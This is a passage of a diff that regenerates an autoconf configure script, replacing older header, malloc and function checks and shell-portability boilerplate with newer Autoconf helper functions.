-if { (ac_try="$ac_compile" -case "(($ac_try" in - *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; - *) ac_try_echo=$ac_try;; -esac -eval "echo \"\$as_me:$LINENO: $ac_try_echo\"") >&5 - (eval "$ac_compile") 2>conftest.er1 - ac_status=$? - grep -v '^ *+' conftest.er1 >conftest.err - rm -f conftest.er1 - cat conftest.err >&5 - echo "$as_me:$LINENO: \$? = $ac_status" >&5 - (exit $ac_status); } && { - test -z "$ac_c_werror_flag" || - test ! -s conftest.err - } && test -s conftest.$ac_objext; then - ac_cv_type_size_t=yes -else - echo "$as_me: failed program was:" >&5 -sed 's/^/| /' conftest.$ac_ext >&5 +ac_fn_c_check_type "$LINENO" "size_t" "ac_cv_type_size_t" "$ac_includes_default" +if test "x$ac_cv_type_size_t" = x""yes; then : - ac_cv_type_size_t=no -fi - -rm -f core conftest.err conftest.$ac_objext conftest.$ac_ext -fi -{ echo "$as_me:$LINENO: result: $ac_cv_type_size_t" >&5 -echo "${ECHO_T}$ac_cv_type_size_t" >&6; } -if test $ac_cv_type_size_t = yes; then - : else cat >>confdefs.h <<_ACEOF @@ -4702,164 +4891,27 @@ fi # Checks for library functions. - for ac_header in stdlib.h -do -as_ac_Header=`echo "ac_cv_header_$ac_header" | $as_tr_sh` -if { as_var=$as_ac_Header; eval "test \"\${$as_var+set}\" = set"; }; then - { echo "$as_me:$LINENO: checking for $ac_header" >&5 -echo $ECHO_N "checking for $ac_header... $ECHO_C" >&6; } -if { as_var=$as_ac_Header; eval "test \"\${$as_var+set}\" = set"; }; then - echo $ECHO_N "(cached) $ECHO_C" >&6 -fi -ac_res=`eval echo '${'$as_ac_Header'}'` - { echo "$as_me:$LINENO: result: $ac_res" >&5 -echo "${ECHO_T}$ac_res" >&6; } -else - # Is the header compilable? -{ echo "$as_me:$LINENO: checking $ac_header usability" >&5 -echo $ECHO_N "checking $ac_header usability... $ECHO_C" >&6; } -cat >conftest.$ac_ext <<_ACEOF -/* confdefs.h. */ -_ACEOF -cat confdefs.h >>conftest.$ac_ext -cat >>conftest.$ac_ext <<_ACEOF -/* end confdefs.h. */ -$ac_includes_default -#include <$ac_header> -_ACEOF -rm -f conftest.$ac_objext -if { (ac_try="$ac_compile" -case "(($ac_try" in - *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; - *) ac_try_echo=$ac_try;; -esac -eval "echo \"\$as_me:$LINENO: $ac_try_echo\"") >&5 - (eval "$ac_compile") 2>conftest.er1 - ac_status=$? - grep -v '^ *+' conftest.er1 >conftest.err - rm -f conftest.er1 - cat conftest.err >&5 - echo "$as_me:$LINENO: \$? = $ac_status" >&5 - (exit $ac_status); } && { - test -z "$ac_c_werror_flag" || - test ! -s conftest.err - } && test -s conftest.$ac_objext; then - ac_header_compiler=yes -else - echo "$as_me: failed program was:" >&5 -sed 's/^/| /' conftest.$ac_ext >&5 - - ac_header_compiler=no -fi - -rm -f core conftest.err conftest.$ac_objext conftest.$ac_ext -{ echo "$as_me:$LINENO: result: $ac_header_compiler" >&5 -echo "${ECHO_T}$ac_header_compiler" >&6; } - -# Is the header present? -{ echo "$as_me:$LINENO: checking $ac_header presence" >&5 -echo $ECHO_N "checking $ac_header presence... $ECHO_C" >&6; } -cat >conftest.$ac_ext <<_ACEOF -/* confdefs.h. */ -_ACEOF -cat confdefs.h >>conftest.$ac_ext -cat >>conftest.$ac_ext <<_ACEOF -/* end confdefs.h. */ -#include <$ac_header> -_ACEOF -if { (ac_try="$ac_cpp conftest.$ac_ext" -case "(($ac_try" in - *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; - *) ac_try_echo=$ac_try;; -esac -eval "echo \"\$as_me:$LINENO: $ac_try_echo\"") >&5 - (eval "$ac_cpp conftest.$ac_ext") 2>conftest.er1 - ac_status=$? - grep -v '^ *+' conftest.er1 >conftest.err - rm -f conftest.er1 - cat conftest.err >&5 - echo "$as_me:$LINENO: \$? = $ac_status" >&5 - (exit $ac_status); } >/dev/null && { - test -z "$ac_c_preproc_warn_flag$ac_c_werror_flag" || - test ! -s conftest.err - }; then - ac_header_preproc=yes -else - echo "$as_me: failed program was:" >&5 -sed 's/^/| /' conftest.$ac_ext >&5 - - ac_header_preproc=no -fi - -rm -f conftest.err conftest.$ac_ext -{ echo "$as_me:$LINENO: result: $ac_header_preproc" >&5 -echo "${ECHO_T}$ac_header_preproc" >&6; } - -# So? What about this header? -case $ac_header_compiler:$ac_header_preproc:$ac_c_preproc_warn_flag in - yes:no: ) - { echo "$as_me:$LINENO: WARNING: $ac_header: accepted by the compiler, rejected by the preprocessor!" >&5 -echo "$as_me: WARNING: $ac_header: accepted by the compiler, rejected by the preprocessor!" >&2;} - { echo "$as_me:$LINENO: WARNING: $ac_header: proceeding with the compiler's result" >&5 -echo "$as_me: WARNING: $ac_header: proceeding with the compiler's result" >&2;} - ac_header_preproc=yes - ;; - no:yes:* ) - { echo "$as_me:$LINENO: WARNING: $ac_header: present but cannot be compiled" >&5 -echo "$as_me: WARNING: $ac_header: present but cannot be compiled" >&2;} - { echo "$as_me:$LINENO: WARNING: $ac_header: check for missing prerequisite headers?" >&5 -echo "$as_me: WARNING: $ac_header: check for missing prerequisite headers?" >&2;} - { echo "$as_me:$LINENO: WARNING: $ac_header: see the Autoconf documentation" >&5 -echo "$as_me: WARNING: $ac_header: see the Autoconf documentation" >&2;} - { echo "$as_me:$LINENO: WARNING: $ac_header: section \"Present But Cannot Be Compiled\"" >&5 -echo "$as_me: WARNING: $ac_header: section \"Present But Cannot Be Compiled\"" >&2;} - { echo "$as_me:$LINENO: WARNING: $ac_header: proceeding with the preprocessor's result" >&5 -echo "$as_me: WARNING: $ac_header: proceeding with the preprocessor's result" >&2;} - { echo "$as_me:$LINENO: WARNING: $ac_header: in the future, the compiler will take precedence" >&5 -echo "$as_me: WARNING: $ac_header: in the future, the compiler will take precedence" >&2;} - ( cat <<\_ASBOX -## --------------------------------- ## -## Report this to piotr@duszynski.eu ## -## --------------------------------- ## -_ASBOX - ) | sed "s/^/$as_me: WARNING: /" >&2 - ;; -esac -{ echo "$as_me:$LINENO: checking for $ac_header" >&5 -echo $ECHO_N "checking for $ac_header... $ECHO_C" >&6; } -if { as_var=$as_ac_Header; eval "test \"\${$as_var+set}\" = set"; }; then - echo $ECHO_N "(cached) $ECHO_C" >&6 -else - eval "$as_ac_Header=\$ac_header_preproc" -fi -ac_res=`eval echo '${'$as_ac_Header'}'` - { echo "$as_me:$LINENO: result: $ac_res" >&5 -echo "${ECHO_T}$ac_res" >&6; } - -fi -if test `eval echo '${'$as_ac_Header'}'` = yes; then +do : + ac_fn_c_check_header_mongrel "$LINENO" "stdlib.h" "ac_cv_header_stdlib_h" "$ac_includes_default" +if test "x$ac_cv_header_stdlib_h" = x""yes; then : cat >>confdefs.h <<_ACEOF -#define `echo "HAVE_$ac_header" | $as_tr_cpp` 1 +#define HAVE_STDLIB_H 1 _ACEOF fi done -{ echo "$as_me:$LINENO: checking for GNU libc compatible malloc" >&5 -echo $ECHO_N "checking for GNU libc compatible malloc... $ECHO_C" >&6; } -if test "${ac_cv_func_malloc_0_nonnull+set}" = set; then - echo $ECHO_N "(cached) $ECHO_C" >&6 +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for GNU libc compatible malloc" >&5 +$as_echo_n "checking for GNU libc compatible malloc... " >&6; } +if test "${ac_cv_func_malloc_0_nonnull+set}" = set; then : + $as_echo_n "(cached) " >&6 else - if test "$cross_compiling" = yes; then + if test "$cross_compiling" = yes; then : ac_cv_func_malloc_0_nonnull=no else - cat >conftest.$ac_ext <<_ACEOF -/* confdefs.h. */ -_ACEOF -cat confdefs.h >>conftest.$ac_ext -cat >>conftest.$ac_ext <<_ACEOF + cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ #if defined STDC_HEADERS || defined HAVE_STDLIB_H # include @@ -4875,52 +4927,24 @@ return ! malloc (0); return 0; } _ACEOF -rm -f conftest$ac_exeext -if { (ac_try="$ac_link" -case "(($ac_try" in - *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; - *) ac_try_echo=$ac_try;; -esac -eval "echo \"\$as_me:$LINENO: $ac_try_echo\"") >&5 - (eval "$ac_link") 2>&5 - ac_status=$? - echo "$as_me:$LINENO: \$? = $ac_status" >&5 - (exit $ac_status); } && { ac_try='./conftest$ac_exeext' - { (case "(($ac_try" in - *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; - *) ac_try_echo=$ac_try;; -esac -eval "echo \"\$as_me:$LINENO: $ac_try_echo\"") >&5 - (eval "$ac_try") 2>&5 - ac_status=$? - echo "$as_me:$LINENO: \$? = $ac_status" >&5 - (exit $ac_status); }; }; then +if ac_fn_c_try_run "$LINENO"; then : ac_cv_func_malloc_0_nonnull=yes else - echo "$as_me: program exited with status $ac_status" >&5 -echo "$as_me: failed program was:" >&5 -sed 's/^/| /' conftest.$ac_ext >&5 - -( exit $ac_status ) -ac_cv_func_malloc_0_nonnull=no + ac_cv_func_malloc_0_nonnull=no fi -rm -f core *.core core.conftest.* gmon.out bb.out conftest$ac_exeext conftest.$ac_objext conftest.$ac_ext +rm -f core *.core core.conftest.* gmon.out bb.out conftest$ac_exeext \ + conftest.$ac_objext conftest.beam conftest.$ac_ext fi - fi -{ echo "$as_me:$LINENO: result: $ac_cv_func_malloc_0_nonnull" >&5 -echo "${ECHO_T}$ac_cv_func_malloc_0_nonnull" >&6; } -if test $ac_cv_func_malloc_0_nonnull = yes; then +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_cv_func_malloc_0_nonnull" >&5 +$as_echo "$ac_cv_func_malloc_0_nonnull" >&6; } +if test $ac_cv_func_malloc_0_nonnull = yes; then : -cat >>confdefs.h <<\_ACEOF -#define HAVE_MALLOC 1 -_ACEOF +$as_echo "#define HAVE_MALLOC 1" >>confdefs.h else - cat >>confdefs.h <<\_ACEOF -#define HAVE_MALLOC 0 -_ACEOF + $as_echo "#define HAVE_MALLOC 0" >>confdefs.h case " $LIBOBJS " in *" malloc.$ac_objext "* ) ;; @@ -4929,105 +4953,19 @@ _ACEOF esac -cat >>confdefs.h <<\_ACEOF -#define malloc rpl_malloc -_ACEOF +$as_echo "#define malloc rpl_malloc" >>confdefs.h fi - - - - for ac_func in inet_ntoa memset socket -do -as_ac_var=`echo "ac_cv_func_$ac_func" | $as_tr_sh` -{ echo "$as_me:$LINENO: checking for $ac_func" >&5 -echo $ECHO_N "checking for $ac_func... $ECHO_C" >&6; } -if { as_var=$as_ac_var; eval "test \"\${$as_var+set}\" = set"; }; then - echo $ECHO_N "(cached) $ECHO_C" >&6 -else - cat >conftest.$ac_ext <<_ACEOF -/* confdefs.h. */ -_ACEOF -cat confdefs.h >>conftest.$ac_ext -cat >>conftest.$ac_ext <<_ACEOF -/* end confdefs.h. */ -/* Define $ac_func to an innocuous variant, in case declares $ac_func. - For example, HP-UX 11i declares gettimeofday. */ -#define $ac_func innocuous_$ac_func - -/* System header to define __stub macros and hopefully few prototypes, - which can conflict with char $ac_func (); below. - Prefer to if __STDC__ is defined, since - exists even on freestanding compilers. */ - -#ifdef __STDC__ -# include -#else -# include -#endif - -#undef $ac_func - -/* Override any GCC internal prototype to avoid an error. - Use char because int might match the return type of a GCC - builtin and then its argument prototype would still apply. */ -#ifdef __cplusplus -extern "C" -#endif -char $ac_func (); -/* The GNU C library defines this for functions which it implements - to always fail with ENOSYS. Some functions are actually named - something starting with __ and the normal name is an alias. */ -#if defined __stub_$ac_func || defined __stub___$ac_func -choke me -#endif - -int -main () -{ -return $ac_func (); - ; - return 0; -} -_ACEOF -rm -f conftest.$ac_objext conftest$ac_exeext -if { (ac_try="$ac_link" -case "(($ac_try" in - *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; - *) ac_try_echo=$ac_try;; -esac -eval "echo \"\$as_me:$LINENO: $ac_try_echo\"") >&5 - (eval "$ac_link") 2>conftest.er1 - ac_status=$? - grep -v '^ *+' conftest.er1 >conftest.err - rm -f conftest.er1 - cat conftest.err >&5 - echo "$as_me:$LINENO: \$? = $ac_status" >&5 - (exit $ac_status); } && { - test -z "$ac_c_werror_flag" || - test ! -s conftest.err - } && test -s conftest$ac_exeext && - $as_test_x conftest$ac_exeext; then - eval "$as_ac_var=yes" -else - echo "$as_me: failed program was:" >&5 -sed 's/^/| /' conftest.$ac_ext >&5 - - eval "$as_ac_var=no" -fi - -rm -f core conftest.err conftest.$ac_objext conftest_ipa8_conftest.oo \ - conftest$ac_exeext conftest.$ac_ext -fi -ac_res=`eval echo '${'$as_ac_var'}'` - { echo "$as_me:$LINENO: result: $ac_res" >&5 -echo "${ECHO_T}$ac_res" >&6; } -if test `eval echo '${'$as_ac_var'}'` = yes; then +do : + as_ac_var=`$as_echo "ac_cv_func_$ac_func" | $as_tr_sh` +ac_fn_c_check_func "$LINENO" "$ac_func" "$as_ac_var" +eval as_val=\$$as_ac_var + if test "x$as_val" = x""yes; then : cat >>confdefs.h <<_ACEOF -#define `echo "HAVE_$ac_func" | $as_tr_cpp` 1 +#define `$as_echo "HAVE_$ac_func" | $as_tr_cpp` 1 _ACEOF fi @@ -5063,12 +5001,13 @@ _ACEOF case $ac_val in #( *${as_nl}*) case $ac_var in #( - *_cv_*) { echo "$as_me:$LINENO: WARNING: Cache variable $ac_var contains a newline." >&5 -echo "$as_me: WARNING: Cache variable $ac_var contains a newline." >&2;} ;; + *_cv_*) { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: cache variable $ac_var contains a newline" >&5 +$as_echo "$as_me: WARNING: cache variable $ac_var contains a newline" >&2;} ;; esac case $ac_var in #( _ | IFS | as_nl) ;; #( - *) $as_unset $ac_var ;; + BASH_ARGV | BASH_SOURCE) eval $ac_var= ;; #( + *) { eval $ac_var=; unset $ac_var;} ;; esac ;; esac done @@ -5076,8 +5015,8 @@ echo "$as_me: WARNING: Cache variable $ac_var contains a newline." >&2;} ;; (set) 2>&1 | case $as_nl`(ac_space=' '; set) 2>&1` in #( *${as_nl}ac_space=\ *) - # `set' does not quote correctly, so add quotes (double-quote - # substitution turns \\\\ into \\, and sed turns \\ into \). + # `set' does not quote correctly, so add quotes: double-quote + # substitution turns \\\\ into \\, and sed turns \\ into \. sed -n \ "s/'/'\\\\''/g; s/^\\([_$as_cr_alnum]*_cv_[_$as_cr_alnum]*\\)=\\(.*\\)/\\1='\\2'/p" @@ -5100,12 +5039,12 @@ echo "$as_me: WARNING: Cache variable $ac_var contains a newline." >&2;} ;; if diff "$cache_file" confcache >/dev/null 2>&1; then :; else if test -w "$cache_file"; then test "x$cache_file" != "x/dev/null" && - { echo "$as_me:$LINENO: updating cache $cache_file" >&5 -echo "$as_me: updating cache $cache_file" >&6;} + { $as_echo "$as_me:${as_lineno-$LINENO}: updating cache $cache_file" >&5 +$as_echo "$as_me: updating cache $cache_file" >&6;} cat confcache >$cache_file else - { echo "$as_me:$LINENO: not updating unwritable cache $cache_file" >&5 -echo "$as_me: not updating unwritable cache $cache_file" >&6;} + { $as_echo "$as_me:${as_lineno-$LINENO}: not updating unwritable cache $cache_file" >&5 +$as_echo "$as_me: not updating unwritable cache $cache_file" >&6;} fi fi rm -f confcache @@ -5121,38 +5060,46 @@ ac_ltlibobjs= for ac_i in : $LIBOBJS; do test "x$ac_i" = x: && continue # 1. Remove the extension, and $U if already installed. ac_script='s/\$U\././;s/\.o$//;s/\.obj$//' - ac_i=`echo "$ac_i" | sed "$ac_script"` + ac_i=`$as_echo "$ac_i" | sed "$ac_script"` # 2. Prepend LIBOBJDIR. When used with automake>=1.10 LIBOBJDIR # will be set to the directory where LIBOBJS objects are built. - ac_libobjs="$ac_libobjs \${LIBOBJDIR}$ac_i\$U.$ac_objext" - ac_ltlibobjs="$ac_ltlibobjs \${LIBOBJDIR}$ac_i"'$U.lo' + as_fn_append ac_libobjs " \${LIBOBJDIR}$ac_i\$U.$ac_objext" + as_fn_append ac_ltlibobjs " \${LIBOBJDIR}$ac_i"'$U.lo' done LIBOBJS=$ac_libobjs LTLIBOBJS=$ac_ltlibobjs + if test -n "$EXEEXT"; then + am__EXEEXT_TRUE= + am__EXEEXT_FALSE='#' +else + am__EXEEXT_TRUE='#' + am__EXEEXT_FALSE= +fi + if test -z "${AMDEP_TRUE}" && test -z "${AMDEP_FALSE}"; then - { { echo "$as_me:$LINENO: error: conditional \"AMDEP\" was never defined. -Usually this means the macro was only invoked conditionally." >&5 -echo "$as_me: error: conditional \"AMDEP\" was never defined. -Usually this means the macro was only invoked conditionally." >&2;} - { (exit 1); exit 1; }; } + as_fn_error "conditional \"AMDEP\" was never defined. +Usually this means the macro was only invoked conditionally." "$LINENO" 5 +fi +if test -z "${am__fastdepCXX_TRUE}" && test -z "${am__fastdepCXX_FALSE}"; then + as_fn_error "conditional \"am__fastdepCXX\" was never defined. +Usually this means the macro was only invoked conditionally." "$LINENO" 5 fi if test -z "${am__fastdepCC_TRUE}" && test -z "${am__fastdepCC_FALSE}"; then - { { echo "$as_me:$LINENO: error: conditional \"am__fastdepCC\" was never defined. -Usually this means the macro was only invoked conditionally." >&5 -echo "$as_me: error: conditional \"am__fastdepCC\" was never defined. -Usually this means the macro was only invoked conditionally." >&2;} - { (exit 1); exit 1; }; } + as_fn_error "conditional \"am__fastdepCC\" was never defined. +Usually this means the macro was only invoked conditionally." "$LINENO" 5 fi : ${CONFIG_STATUS=./config.status} +ac_write_fail=0 ac_clean_files_save=$ac_clean_files ac_clean_files="$ac_clean_files $CONFIG_STATUS" -{ echo "$as_me:$LINENO: creating $CONFIG_STATUS" >&5 -echo "$as_me: creating $CONFIG_STATUS" >&6;} -cat >$CONFIG_STATUS <<_ACEOF +{ $as_echo "$as_me:${as_lineno-$LINENO}: creating $CONFIG_STATUS" >&5 +$as_echo "$as_me: creating $CONFIG_STATUS" >&6;} +as_write_fail=0 +cat >$CONFIG_STATUS <<_ASEOF || as_write_fail=1 #! $SHELL # Generated by $as_me. # Run this file to recreate the current configuration. @@ -5162,59 +5109,79 @@ cat >$CONFIG_STATUS <<_ACEOF debug=false ac_cs_recheck=false ac_cs_silent=false -SHELL=\${CONFIG_SHELL-$SHELL} -_ACEOF -cat >>$CONFIG_STATUS <<\_ACEOF -## --------------------- ## -## M4sh Initialization. ## -## --------------------- ## +SHELL=\${CONFIG_SHELL-$SHELL} +export SHELL +_ASEOF +cat >>$CONFIG_STATUS <<\_ASEOF || as_write_fail=1 +## -------------------- ## +## M4sh Initialization. ## +## -------------------- ## # Be more Bourne compatible DUALCASE=1; export DUALCASE # for MKS sh -if test -n "${ZSH_VERSION+set}" && (emulate sh) >/dev/null 2>&1; then +if test -n "${ZSH_VERSION+set}" && (emulate sh) >/dev/null 2>&1; then : emulate sh NULLCMD=: - # Zsh 3.x and 4.x performs word splitting on ${1+"$@"}, which + # Pre-4.2 versions of Zsh do word splitting on ${1+"$@"}, which # is contrary to our usage. Disable this feature. alias -g '${1+"$@"}'='"$@"' setopt NO_GLOB_SUBST else - case `(set -o) 2>/dev/null` in - *posix*) set -o posix ;; + case `(set -o) 2>/dev/null` in #( + *posix*) : + set -o posix ;; #( + *) : + ;; esac - fi - - -# PATH needs CR -# Avoid depending upon Character Ranges. -as_cr_letters='abcdefghijklmnopqrstuvwxyz' -as_cr_LETTERS='ABCDEFGHIJKLMNOPQRSTUVWXYZ' -as_cr_Letters=$as_cr_letters$as_cr_LETTERS -as_cr_digits='0123456789' -as_cr_alnum=$as_cr_Letters$as_cr_digits +as_nl=' +' +export as_nl +# Printing a long string crashes Solaris 7 /usr/bin/printf. +as_echo='\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' +as_echo=$as_echo$as_echo$as_echo$as_echo$as_echo +as_echo=$as_echo$as_echo$as_echo$as_echo$as_echo$as_echo +# Prefer a ksh shell builtin over an external printf program on Solaris, +# but without wasting forks for bash or zsh. +if test -z "$BASH_VERSION$ZSH_VERSION" \ + && (test "X`print -r -- $as_echo`" = "X$as_echo") 2>/dev/null; then + as_echo='print -r --' + as_echo_n='print -rn --' +elif (test "X`printf %s $as_echo`" = "X$as_echo") 2>/dev/null; then + as_echo='printf %s\n' + as_echo_n='printf %s' +else + if test "X`(/usr/ucb/echo -n -n $as_echo) 2>/dev/null`" = "X-n $as_echo"; then + as_echo_body='eval /usr/ucb/echo -n "$1$as_nl"' + as_echo_n='/usr/ucb/echo -n' + else + as_echo_body='eval expr "X$1" : "X\\(.*\\)"' + as_echo_n_body='eval + arg=$1; + case $arg in #( + *"$as_nl"*) + expr "X$arg" : "X\\(.*\\)$as_nl"; + arg=`expr "X$arg" : ".*$as_nl\\(.*\\)"`;; + esac; + expr "X$arg" : "X\\(.*\\)" | tr -d "$as_nl" + ' + export as_echo_n_body + as_echo_n='sh -c $as_echo_n_body as_echo' + fi + export as_echo_body + as_echo='sh -c $as_echo_body as_echo' +fi # The user is always right. if test "${PATH_SEPARATOR+set}" != set; then - echo "#! /bin/sh" >conf$$.sh - echo "exit 0" >>conf$$.sh - chmod +x conf$$.sh - if (PATH="/nonexistent;."; conf$$.sh) >/dev/null 2>&1; then - PATH_SEPARATOR=';' - else - PATH_SEPARATOR=: - fi - rm -f conf$$.sh -fi - -# Support unset when possible. -if ( (MAIL=60; unset MAIL) || exit) >/dev/null 2>&1; then - as_unset=unset -else - as_unset=false + PATH_SEPARATOR=: + (PATH='/bin;/bin'; FPATH=$PATH; sh -c :) >/dev/null 2>&1 && { + (PATH='/bin:/bin'; FPATH=$PATH; sh -c :) >/dev/null 2>&1 || + PATH_SEPARATOR=';' + } fi @@ -5223,20 +5190,18 @@ fi # there to prevent editors from complaining about space-tab. # (If _AS_PATH_WALK were called with IFS unset, it would disable word # splitting by setting IFS to empty value.) -as_nl=' -' IFS=" "" $as_nl" # Find who we are. Look in the path if we contain no directory separator. -case $0 in +case $0 in #(( *[\\/]* ) as_myself=$0 ;; *) as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. - test -r "$as_dir/$0" && as_myself=$as_dir/$0 && break -done + test -r "$as_dir/$0" && as_myself=$as_dir/$0 && break + done IFS=$as_save_IFS ;; @@ -5247,32 +5212,111 @@ if test "x$as_myself" = x; then as_myself=$0 fi if test ! -f "$as_myself"; then - echo "$as_myself: error: cannot find myself; rerun with an absolute file name" >&2 - { (exit 1); exit 1; } + $as_echo "$as_myself: error: cannot find myself; rerun with an absolute file name" >&2 + exit 1 fi -# Work around bugs in pre-3.0 UWIN ksh. -for as_var in ENV MAIL MAILPATH -do ($as_unset $as_var) >/dev/null 2>&1 && $as_unset $as_var +# Unset variables that we do not need and which cause bugs (e.g. in +# pre-3.0 UWIN ksh). But do not cause bugs in bash 2.01; the "|| exit 1" +# suppresses any "Segmentation fault" message there. '((' could +# trigger a bug in pdksh 5.2.14. +for as_var in BASH_ENV ENV MAIL MAILPATH +do eval test x\${$as_var+set} = xset \ + && ( (unset $as_var) || exit 1) >/dev/null 2>&1 && unset $as_var || : done PS1='$ ' PS2='> ' PS4='+ ' # NLS nuisances. -for as_var in \ - LANG LANGUAGE LC_ADDRESS LC_ALL LC_COLLATE LC_CTYPE LC_IDENTIFICATION \ - LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER \ - LC_TELEPHONE LC_TIME -do - if (set +x; test -z "`(eval $as_var=C; export $as_var) 2>&1`"); then - eval $as_var=C; export $as_var - else - ($as_unset $as_var) >/dev/null 2>&1 && $as_unset $as_var - fi -done +LC_ALL=C +export LC_ALL +LANGUAGE=C +export LANGUAGE + +# CDPATH. +(unset CDPATH) >/dev/null 2>&1 && unset CDPATH + + +# as_fn_error ERROR [LINENO LOG_FD] +# --------------------------------- +# Output "`basename $0`: error: ERROR" to stderr. If LINENO and LOG_FD are +# provided, also output the error to LOG_FD, referencing LINENO. Then exit the +# script with status $?, using 1 if that was 0. +as_fn_error () +{ + as_status=$?; test $as_status -eq 0 && as_status=1 + if test "$3"; then + as_lineno=${as_lineno-"$2"} as_lineno_stack=as_lineno_stack=$as_lineno_stack + $as_echo "$as_me:${as_lineno-$LINENO}: error: $1" >&$3 + fi + $as_echo "$as_me: error: $1" >&2 + as_fn_exit $as_status +} # as_fn_error + + +# as_fn_set_status STATUS +# ----------------------- +# Set $? to STATUS, without forking. +as_fn_set_status () +{ + return $1 +} # as_fn_set_status + +# as_fn_exit STATUS +# ----------------- +# Exit the shell with STATUS, even in a "trap 0" or "set -e" context. +as_fn_exit () +{ + set +e + as_fn_set_status $1 + exit $1 +} # as_fn_exit + +# as_fn_unset VAR +# --------------- +# Portably unset VAR. +as_fn_unset () +{ + { eval $1=; unset $1;} +} +as_unset=as_fn_unset +# as_fn_append VAR VALUE +# ---------------------- +# Append the text in VALUE to the end of the definition contained in VAR. Take +# advantage of any shell optimizations that allow amortized linear growth over +# repeated appends, instead of the typical quadratic growth present in naive +# implementations. +if (eval "as_var=1; as_var+=2; test x\$as_var = x12") 2>/dev/null; then : + eval 'as_fn_append () + { + eval $1+=\$2 + }' +else + as_fn_append () + { + eval $1=\$$1\$2 + } +fi # as_fn_append + +# as_fn_arith ARG... +# ------------------ +# Perform arithmetic evaluation on the ARGs, and store the result in the +# global $as_val. Take advantage of shells that can avoid forks. The arguments +# must be portable across $(()) and expr. +if (eval "test \$(( 1 + 1 )) = 2") 2>/dev/null; then : + eval 'as_fn_arith () + { + as_val=$(( $* )) + }' +else + as_fn_arith () + { + as_val=`expr "$@" || test $? -eq 1` + } +fi # as_fn_arith + -# Required to use basename. if expr a : '\(a\)' >/dev/null 2>&1 && test "X`expr 00001 : '.*\(...\)'`" = X001; then as_expr=expr @@ -5286,13 +5330,17 @@ else as_basename=false fi +if (as_dir=`dirname -- /` && test "X$as_dir" = X/) >/dev/null 2>&1; then + as_dirname=dirname +else + as_dirname=false +fi -# Name of the executable. as_me=`$as_basename -- "$0" || $as_expr X/"$0" : '.*/\([^/][^/]*\)/*$' \| \ X"$0" : 'X\(//\)$' \| \ X"$0" : 'X\(/\)' \| . 2>/dev/null || -echo X/"$0" | +$as_echo X/"$0" | sed '/^.*\/\([^/][^/]*\)\/*$/{ s//\1/ q @@ -5307,104 +5355,103 @@ echo X/"$0" | } s/.*/./; q'` -# CDPATH. -$as_unset CDPATH - - - - as_lineno_1=$LINENO - as_lineno_2=$LINENO - test "x$as_lineno_1" != "x$as_lineno_2" && - test "x`expr $as_lineno_1 + 1`" = "x$as_lineno_2" || { - - # Create $as_me.lineno as a copy of $as_myself, but with $LINENO - # uniformly replaced by the line number. The first 'sed' inserts a - # line-number line after each line using $LINENO; the second 'sed' - # does the real work. The second script uses 'N' to pair each - # line-number line with the line containing $LINENO, and appends - # trailing '-' during substitution so that $LINENO is not a special - # case at line end. - # (Raja R Harinath suggested sed '=', and Paul Eggert wrote the - # scripts with optimization help from Paolo Bonzini. Blame Lee - # E. McMahon (1931-1989) for sed's syntax. :-) - sed -n ' - p - /[$]LINENO/= - ' <$as_myself | - sed ' - s/[$]LINENO.*/&-/ - t lineno - b - :lineno - N - :loop - s/[$]LINENO\([^'$as_cr_alnum'_].*\n\)\(.*\)/\2\1\2/ - t loop - s/-\n.*// - ' >$as_me.lineno && - chmod +x "$as_me.lineno" || - { echo "$as_me: error: cannot create $as_me.lineno; rerun with a POSIX shell" >&2 - { (exit 1); exit 1; }; } - - # Don't try to exec as it changes $[0], causing all sort of problems - # (the dirname of $[0] is not the place where we might find the - # original and so on. Autoconf is especially sensitive to this). - . "./$as_me.lineno" - # Exit status is that of the last command. - exit -} - - -if (as_dir=`dirname -- /` && test "X$as_dir" = X/) >/dev/null 2>&1; then - as_dirname=dirname -else - as_dirname=false -fi +# Avoid depending upon Character Ranges. +as_cr_letters='abcdefghijklmnopqrstuvwxyz' +as_cr_LETTERS='ABCDEFGHIJKLMNOPQRSTUVWXYZ' +as_cr_Letters=$as_cr_letters$as_cr_LETTERS +as_cr_digits='0123456789' +as_cr_alnum=$as_cr_Letters$as_cr_digits ECHO_C= ECHO_N= ECHO_T= -case `echo -n x` in +case `echo -n x` in #((((( -n*) - case `echo 'x\c'` in + case `echo 'xy\c'` in *c*) ECHO_T=' ';; # ECHO_T is single tab character. - *) ECHO_C='\c';; + xy) ECHO_C='\c';; + *) echo `echo ksh88 bug on AIX 6.1` > /dev/null + ECHO_T=' ';; esac;; *) ECHO_N='-n';; esac -if expr a : '\(a\)' >/dev/null 2>&1 && - test "X`expr 00001 : '.*\(...\)'`" = X001; then - as_expr=expr -else - as_expr=false -fi - rm -f conf$$ conf$$.exe conf$$.file if test -d conf$$.dir; then rm -f conf$$.dir/conf$$.file else rm -f conf$$.dir - mkdir conf$$.dir + mkdir conf$$.dir 2>/dev/null fi -echo >conf$$.file -if ln -s conf$$.file conf$$ 2>/dev/null; then - as_ln_s='ln -s' - # ... but there are two gotchas: - # 1) On MSYS, both `ln -s file dir' and `ln file dir' fail. - # 2) DJGPP < 2.04 has no symlinks; `ln -s' creates a wrapper executable. - # In both cases, we have to default to `cp -p'. - ln -s conf$$.file conf$$.dir 2>/dev/null && test ! -f conf$$.exe || +if (echo >conf$$.file) 2>/dev/null; then + if ln -s conf$$.file conf$$ 2>/dev/null; then + as_ln_s='ln -s' + # ... but there are two gotchas: + # 1) On MSYS, both `ln -s file dir' and `ln file dir' fail. + # 2) DJGPP < 2.04 has no symlinks; `ln -s' creates a wrapper executable. + # In both cases, we have to default to `cp -p'. + ln -s conf$$.file conf$$.dir 2>/dev/null && test ! -f 